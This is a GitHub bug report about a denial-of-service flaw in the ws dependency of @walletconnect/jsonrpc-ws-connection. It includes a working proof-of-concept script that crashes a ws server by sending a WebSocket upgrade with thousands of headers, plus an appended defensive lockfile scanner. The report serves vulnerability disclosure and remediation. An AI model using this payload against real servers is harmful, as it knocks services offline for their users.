Vulnerable ws dependency causing DoS vulnerability #4705

Open
josadcha opened this issue Jun 27, 2024 · 1 comment
Labels
type: bug Something isn't working

Comments

@josadcha

Describe the bug
The @walletconnect/jsonrpc-ws-connection package depends on a vulnerable version of the ws package (^7.5.1). This vulnerability allows a Denial of Service (DoS) attack by sending a request with many HTTP headers, exceeding the server.maxHeadersCount threshold and causing the server to crash.

SDK Version (if relevant)

  • Client: JS
  • Version 2.13.3

To Reproduce
Steps to reproduce the behavior:

  1. Set up a project with the @walletconnect/jsonrpc-ws-connection package.
  2. Use the following proof of concept code (from Dependabot) to send a request with excessive headers:
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Expected behavior
The @walletconnect/jsonrpc-ws-connection package should depend on a non-vulnerable version of the ws package (>=8.17.1). The server should handle requests with many HTTP headers gracefully without crashing.

Screenshots
N/A

Desktop (please complete the following information):

  • OS: [e.g. iOS]
  • Browser [e.g. chrome, safari]
  • Version [e.g. 22]

Smartphone (please complete the following information):

  • Device: [e.g. iPhone6]
  • OS: [e.g. iOS8.1]
  • Browser [e.g. stock browser, safari]
  • Version [e.g. 22]

Additional context
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230

@josadcha josadcha added the type: bug Something isn't working label Jun 27, 2024
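As an added example (not code from the issue, from Dependabot, or from the WalletConnect project), the following Node.js script checks a `package-lock.json` for copies of `ws` that are still below the patched release, including copies nested under another package, which is exactly how a transitive dependency like `@walletconnect/jsonrpc-ws-connection` can keep an old `ws` installed next to a current top-level one. The 8.17.1 threshold is the one the issue names; the 7.x backport version in the map comes from the upstream `ws` advisory rather than this page. The embedded lockfile is constructed sample data with made-up versions.

```javascript
// Added example, not code from the issue or the WalletConnect project.
// Scans an npm package-lock.json (lockfileVersion 2/3 "packages" map) for
// installed copies of `ws` older than the patched release and reports which
// package pulls each copy in, so a nested vulnerable copy is not missed.

// Patched versions per major line. 8.17.1 is the version named in the
// issue; 7.5.10 is the 7.x backport published by the ws project.
const FIXED_WS_BY_MAJOR = { 8: '8.17.1', 7: '7.5.10' };

// Numeric comparison of dotted versions; pre-release suffixes are dropped.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// A ws version is treated as vulnerable when it is below the patched release
// on its major line, or when its line has no known patched release at all.
function isVulnerableWsVersion(version, fixedByMajor = FIXED_WS_BY_MAJOR) {
  const major = Number(version.split('.')[0]);
  const fixed = fixedByMajor[major];
  if (!fixed) return true;
  return compareVersions(version, fixed) < 0;
}

// Walk every "packages" key that ends in node_modules/ws (root or nested).
function findVulnerableWs(lockfile, fixedByMajor = FIXED_WS_BY_MAJOR) {
  const findings = [];
  for (const [path, entry] of Object.entries(lockfile.packages || {})) {
    const isWs = path === 'node_modules/ws' || path.endsWith('/node_modules/ws');
    if (!isWs || !entry.version) continue;
    if (!isVulnerableWsVersion(entry.version, fixedByMajor)) continue;
    // The package that owns this copy is the path segment before the last
    // node_modules/ws; the top-level copy belongs to the project itself.
    const owner = path === 'node_modules/ws'
      ? '(project root)'
      : path.slice(0, -'/node_modules/ws'.length).split('node_modules/').pop();
    findings.push({ path, version: entry.version, owner });
  }
  return findings;
}

// Constructed sample lockfile: the nested copy mirrors the situation in the
// issue (jsonrpc-ws-connection declaring ws ^7.5.1); all versions are made up.
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0' },
    'node_modules/ws': { version: '8.17.1' },
    'node_modules/@walletconnect/jsonrpc-ws-connection': {
      version: '1.0.0-sample',
      dependencies: { ws: '^7.5.1' },
    },
    'node_modules/@walletconnect/jsonrpc-ws-connection/node_modules/ws': {
      version: '7.5.9',
    },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  // Usage: node check-ws.js [path/to/package-lock.json]; falls back to the sample.
  const lock = process.argv[2]
    ? JSON.parse(require('fs').readFileSync(process.argv[2], 'utf8'))
    : SAMPLE_LOCKFILE;
  for (const f of findVulnerableWs(lock)) {
    console.log(`vulnerable ws ${f.version} at ${f.path} (pulled in by ${f.owner})`);
  }
}
```

Run against the sample, the top-level `ws` 8.17.1 passes and the nested 7.5.9 under `@walletconnect/jsonrpc-ws-connection` is reported, which is the finding that matters here: bumping the root dependency alone does not remove the nested copy, so the fix has to land in the package that declares the `^7.5.1` range (or be forced through an `overrides` entry) and the lockfile re-checked afterwards.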

linear bot commented Jun 27, 2024

CR-94 Vulnerable `ws` dependency causing DoS vulnerability
